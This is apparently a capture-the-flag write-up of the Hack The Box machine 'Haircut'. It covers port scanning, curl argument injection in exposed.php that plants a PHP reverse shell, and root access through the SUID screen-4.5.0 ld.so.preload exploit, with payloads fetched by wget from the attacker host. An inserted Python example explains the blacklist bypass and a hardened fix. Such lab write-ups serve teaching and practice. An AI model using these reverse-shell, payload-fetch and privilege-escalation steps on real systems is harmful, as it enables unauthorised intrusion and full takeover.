Haircut HTB

IP

10.10.10.24

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.24 | grep '^[0-9]' | cut -d"/" -f1 | tr '\n' ','

we have the following ports open

22,80

Let's run a more in-depth scan

sudo nmap -sCV -p22,80 -oA nmap_results 10.10.10.24

results

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser 
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds

we can see

  • SSH on 22 (OpenSSH 7.2p2, Ubuntu)

  • HTTP on 80 (nginx 1.10.0)

Let's check out the web server, starting with feroxbuster

feroxbuster -u http://10.10.10.24 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs.txt

we do find a couple of interesting directories

301      GET        7l       13w      194c http://10.10.10.24/uploads => http://10.10.10.24/uploads/
200      GET      286l     1220w   226984c http://10.10.10.24/bounce.jpg
200      GET        7l       15w      144c http://10.10.10.24/
200      GET       19l       41w      446c http://10.10.10.24/exposed.php

/exposed.php

/exposed.php presents a form with a single URL field and a go button; when we submit a URL and hit go, the page fetches it and shows us the result

Let's catch a request with Burp and see if we can find anything interesting

the web app looks like it is passing our input to a curl command on the server, meaning that if we alter the request we may be able to make the server download a PHP shell onto itself

  1. Let's take the Pentest Monkey PHP reverse shell and change the IP in the script to our own

  2. Let's start an nc listener

nc -lvnp 1234

  3. Let's start a Python HTTP server to host the shell

python3 -m http.server 80

  4. In Repeater, let's see if we can get the curl command to download our shell.php. Since we know there is a /uploads directory, this seems like the perfect place to put our shell

  5. Now if we navigate to /uploads/shell.php, the callback to our listener is established and we have a shell on the system

Let's upgrade our shell

python3 -c "import pty;pty.spawn('/bin/bash')"

we can read the source of exposed.php within /var/www/html

and it confirms that the PHP builds a curl command from our input and runs it through the shell, after checking the input against a blacklist of characters
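The reason the blacklist can be bypassed, as an added example that is not the box's exposed.php: because the PHP concatenates our input into a shell command string, the shell splits it on whitespace, so a space followed by `-o` inside the "URL" becomes a curl option rather than part of the URL. The blacklist contents, the attacker IP and the hardened alternative below are assumptions for illustration (the page only shows that a character blacklist exists and that /var/www/html/uploads is the web-reachable directory).

```python
"""Why a character blacklist does not stop curl argument injection.

Added example, not the box's exposed.php: the blacklist contents and
the attacker IP are assumptions made for illustration.
"""
import shlex
from urllib.parse import urlparse

# Constructed blacklist of shell metacharacters; the writeup only says a
# character blacklist exists, so this list is an assumption.
BLACKLIST = ["%", "!", "|", ";", "&", "#", "`", "$", "{", "}", "[", "]", "(", ")", "<", ">"]

# Web root and uploads directory seen on the box; the attacker IP is assumed.
UPLOADS_DIR = "/var/www/html/uploads"
ATTACKER = "10.10.14.2"


def passes_blacklist(userurl: str) -> bool:
    """Emulates the server-side filter: reject if any banned character appears."""
    return not any(bad in userurl for bad in BLACKLIST)


def vulnerable_argv(userurl: str) -> list[str]:
    """Emulates shell_exec("curl " . $userurl): the shell splits the string on
    whitespace, so every space-separated token becomes its own curl argument
    and any token starting with '-' is parsed by curl as an option."""
    return shlex.split("curl " + userurl)


def build_payload(attacker: str = ATTACKER, dest: str = f"{UPLOADS_DIR}/shell.php") -> str:
    """The 'URL' submitted in the form: a real URL for curl to fetch, followed
    by -o to write the response into the web root. Contains no blacklisted
    characters, only letters, digits, ':', '/', '.', '-' and spaces."""
    return f"http://{attacker}/shell.php -o {dest}"


def hardened_argv(userurl: str) -> list[str]:
    """Allow-list alternative: parse the URL, require http/https and a host,
    forbid whitespace, and pass it after '--' so curl never treats it as an
    option. Execute with subprocess.run(argv) (shell=False), never via a shell."""
    if any(ch.isspace() for ch in userurl):
        raise ValueError("whitespace not allowed in URL")
    parsed = urlparse(userurl)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        raise ValueError("only http(s) URLs with a host are allowed")
    return ["curl", "--", userurl]


if __name__ == "__main__":
    payload = build_payload()
    print("payload passes blacklist:", passes_blacklist(payload))
    print("argv seen by the vulnerable code:", vulnerable_argv(payload))
    try:
        hardened_argv(payload)
    except ValueError as err:
        print("hardened filter rejects payload:", err)
    print("hardened argv for a legitimate URL:", hardened_argv("http://example.com/"))
```

The takeaway is that blacklisting shell metacharacters only addresses command chaining; it does nothing about the argument boundary inside the command that is being built, which is what `-o` abuses here. Validating the URL structurally and invoking curl with an argument vector closes both gaps.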

Let's check the kernel version

uname -r

results

4.4.0-78-generic
  • nothing interesting

Let's see which binaries have the SUID bit set

find / -type f -perm /4000 2>/dev/null

among the results, the screen-4.5.0 binary stands out as an interesting file to have SUID. After some googling we find a known exploit for this version: it abuses the SUID screen to create an /etc/ld.so.preload file pointing to a library that makes a shell binary setuid root, then calls screen again to trigger it

https://github.com/XiphosResearch/exploits/blob/master/screen2root/README.md

we can upload the exploit to our target machine

Running the original exploit script on the target produced a strange error, so we'll break the exploit into three parts: the shared library, the root shell binary, and a short script with the remaining commands

Let's compile the library and the shell locally, following the original script (the output names match what we will fetch onto the target below)

gcc -fPIC -shared -ldl -o libhax.so exploit.c
gcc -o rootshell root.c

Now let's transfer these files across

python3 -m http.server 80

from the target machine, within the /tmp directory

wget http://10.10.14.2:80/libhax.so
wget http://10.10.14.2:80/rootshell
wget http://10.10.14.2:80/root.sh

once we have all the files compiled and on the target we can execute them

  1. We'll change directory into /etc, set the umask to 000 as the original exploit does, and run the SUID screen with -L so that its logfile, ld.so.preload, is written into /etc with the path of our library

cd /etc
umask 000
screen-4.5.0 -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"

  2. By this point ld.so.preload should contain a reference to /tmp/libhax.so

cat ld.so.preload

  3. Now any dynamically linked program we run preloads our library, and because screen is SUID the library runs as root. Running screen -ls triggers it

screen-4.5.0 -ls

  4. ld.so.preload has now been cleaned up by the library, and if we check the permissions on rootshell it's owned by root with the SUID bit set

now we just need to execute the binary and we have root

/tmp/rootshell 
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
